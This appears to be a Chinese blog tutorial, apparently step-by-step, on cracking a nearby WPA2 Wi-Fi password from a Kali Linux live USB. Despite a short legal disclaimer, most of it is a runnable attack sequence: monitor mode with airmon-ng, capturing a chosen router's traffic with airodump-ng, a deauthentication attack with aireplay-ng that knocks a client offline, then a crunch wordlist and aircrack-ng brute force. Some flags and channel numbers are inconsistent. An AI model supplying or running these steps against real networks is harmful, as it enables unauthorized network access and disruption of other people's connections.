记一次无线网卡实现wifi渗透

时间:2023-02-11 22:04:34

前言:

#请大家遵守网络安全法!本教程仅供学习和教学,切勿做违法的事情,让我们一起做一个守法公民!

这里的无网卡指的是不去上网购买网卡,但是还是需要用到笔记本电脑自带的网卡。这时,我们并不采用虚拟机来开启kali Linux,而是采用制作U盘,用usb启动的方式来打开kali Linux系统,实现笔记本自带网卡的wifi渗透 

那么下面开始教程,史上最详细,小白也会懂 

一.先制作带有kali Linux镜像的U盘 

1.进入kali官网:Get Kali | Kali Linux 

2.下滑会找到 

记一次无线网卡实现wifi渗透

3.点击live boot 

4.点击此处下载  

记一次无线网卡实现wifi渗透

5.下载好镜像后继续下载usb制作器Rufus 

下载地址:Rufus - 轻松创建USB启动盘 

6.准备就绪后将Rufus上的选择都按如图选择 


记一次无线网卡实现wifi渗透

 7. 可能会收到有关ISOHybird图像的提示。选择ISO映像,将允许您从Kali Linux ISO编辑文件,但可能会失去硬件兼容性。因此,我们建议选择 DD 映像。 

记一次无线网卡实现wifi渗透

 注意:如果选择“DD映像”选项,则可以在USB驱动器上创建另一个分区,从而允许您使用其余空间。开始 ->运行 (Windows + R) -> diskmgmt.msc -> 找到 USB 驱动器 -> 右键单击“未分配” -> 新建简单卷 -> 按照向导的其余部分与下一步,下一步,下一步... 

8.等待加载完后,U盘就制作完成了 

二.Usb启动项启动kali Linux 

这时需要关闭电脑,在点开电源键时疯狂按进入BIOS的按键 

比如:我的电脑是dell,我的BIOS启动是f12,每个牌子的电脑有着不同的进入BIOS的特殊按键,这个需要上网去查。  

进入后页面是这样 

记一次无线网卡实现wifi渗透

 选择开头是USB的进入(但我的电脑没有显示usb,可能是U盘的问题),即可进入kali Linux系统 

记一次无线网卡实现wifi渗透

 三.Wifi渗透实验 

1.设置无线网卡监听模式 

首先列出所有可能干扰无线网卡的程序,并终止这些程序:sudo airmon-ng check 

记一次无线网卡实现wifi渗透

 打开监听(混杂模式),并查看此时无线网卡状态 

sudo airmon-ng start wlan0 

iwconfig 

记一次无线网卡实现wifi渗透

 此时无线网卡变成了‘wlan0mon’ 

接着重启网卡 

sudo ifconfig wlan0mon down 

sudo iwconfig wlan0mon mode monitor 

sudo ifconfig wlan0mon up 

2.开启探测并抓包 

开启探测:sudo airodump-ng wlan0mon 

得到周围WiFi信息: 

记一次无线网卡实现wifi渗透

 选取我们要攻击的WiFi,例如backup mac为:8C:DE:F9:25:7A:B8  CH为1 

开始抓包:sudo airodump-ng –ivs –bssid 8C:DE:F9:25:7A:B8 -w longas.txt -c 1 wlan0mon 

记一次无线网卡实现wifi渗透

 此时,home文件夹里出现了longas.txt-01.ivs文件 

记一次无线网卡实现wifi渗透

 --bssid 是路由器的mac地址 

-w 是写入到文件longas.txt中0 

-c 11 是频道11 

--ivs 是之抓取可用于破解的iVS数据报文 

3.攻击获得WPA2握手验证数据包 

这里为了获得破解所需的WPA2握手验证的整个完整数据包,我们将会发送一种称之为“deauth”的数据包来将已经连接至无线路由器的合法无线客户端强制断开,此时,客户端就会自动重新连接无线路由器,我们也就有机会捕获到包含WPS2握手验证的完整数据包了。 

接下来就需要进行攻击了:新开一个shell 

sudo aireplay-ng -0 5 -a 8C:DE:F9:25:7A:B8 -c 28:39:26:38:7D:9B wlan0mon 

记一次无线网卡实现wifi渗透

 -0采用deauth攻击模式,后面跟上攻击次数,这里我设置为5,大家可以根据实际情况设置为1-10不等 

-a后面跟路由器mac地址 

-c后面跟客户端(即连接在此wifi上的某一台设备)的mac地址 

此时抓包界面出现“handshake”,即得到了包含WPA2握手验证的完整数据包longas.txt-01.ivs,结束抓包 

记一次无线网卡实现wifi渗透

 4.使用crunch得到密码字典 

Crunch是kali Linux自带的程序 

在shell中输入命令: 

crunch 8 8 -t saic%%%% -b 20mb -o START 

记一次无线网卡实现wifi渗透

 min 设定最小字符串长度 

max 设定最大字符串长度 

-t 指定密码输出的格式 

Crunch特殊字符 

1.%代表数字 

2.^代表特殊符号 

3.@ 代表小写字母 

4.,代表大写符 

-b 指定文件输出的大小为20mb 

-o 将密码保存到指定文件,后面必须为START 

具体参数可参照: 

linuxcrunch命令参数,crunch命令详解 以及使用方法(综合我的经验)_春雪芳菲的博客-CSDN博客 

会生成下面这一长串文件 

记一次无线网卡实现wifi渗透

 将这一长串重命名得到密码字典 

passwd.txt 

记一次无线网卡实现wifi渗透

 5.遍历字典破译WiFi密码 

sudo aircrack-ng -w passwd.txt longas.txt-01.ivs 

耐心等候以后得到: 

记一次无线网卡实现wifi渗透

 结语:为了写这个贴子,我的电脑直接坏了,这个故事告诉我们,没事别随便重启电脑,重启电脑次数多了电脑直接开不开机,我重新刷了机才能打开,原来保存的东西全部丢失,我emo了……………..